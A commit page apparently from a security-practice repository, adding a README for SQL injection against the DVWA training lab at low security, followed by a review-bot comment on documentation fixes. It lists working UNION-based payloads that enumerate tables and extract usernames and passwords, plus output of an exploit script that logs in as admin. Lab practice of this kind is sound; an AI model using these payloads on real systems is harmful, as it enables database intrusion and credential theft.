
Commit c20faa0

split some of directory, and add sqli exploit scripting and poc
1 parent 0d1c63c commit c20faa0

9 files changed

+42
-0
lines changed
File renamed without changes.
File renamed without changes.
File renamed without changes.

dvwa/dvwa_sqli/low/README.md

Lines changed: 42 additions & 0 deletions
@@ -0,0 +1,42 @@
1+
# PoC
2+
- determine the number of columns
3+
`' ORDER BY 2#`
4+
5+
- finding columns with a useful data type
6+
`' UNION SELECT 'test', NULL#` => the column contains string/text data type
7+
8+
- check version and database
9+
`' UNION SELECT version(), NULL#`
10+
`' UNION SELECT database(), NULL#`
11+
12+
- retrieve table name from database
13+
`' UNION SELECT NULL, table_name FROM information_schema.tables#`
14+
15+
- retrieve column name from table
16+
`' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name = 'users'#`
17+
18+
- extract sensitive information from database
19+
`' UNION SELECT user, password FROM users#`
20+
21+
python script usage
22+
```bash
23+
$ python3 dvwa_sqli.py
24+
25+
>> DVWA SQL Injection
26+
>> by twseptian
27+
28+
[*] Usage: dvwa_sqli.py <url>
29+
[*] Example: dvwa_sqli.py www.example.com
30+
31+
$ python3 dvwa_sqli.py "http://172.17.0.2"
32+
33+
>> DVWA SQL Injection
34+
>> by twseptian
35+
36+
[*] Grabbing user token & session id...
37+
[✓] user token: 30dac21baf3a6f8d981cb87821e3b335
38+
[✓] session id: 2crpah8eribtb448bgs6t7lql4
39+
[✓] Success login to Admin page
40+
[*] Looking for a users table...
41+
[✓] Found the users table name: Surname: users
42+
```
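Review bot: The usage text at README lines 28-29 disagrees with the working invocation at line 31: the example passes `www.example.com` with no scheme, while the call that succeeds passes `"http://172.17.0.2"`. Make the example show the form the script actually accepts, or have the script normalise a bare host. Line 41 prints `Found the users table name: Surname: users`, which reads as if the page's `Surname:` label leaked into the result; strip the label before printing. The sample output at lines 37-38 pastes a user token and session id verbatim; replace both with placeholders so session material does not end up in committed docs. The "python script usage" line at 21 is plain text while the PoC section uses a `#` heading, so give it a heading as well. The README should also say at the top that these payloads are for the DVWA lab at the low security level, since at the moment only the directory path says so.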
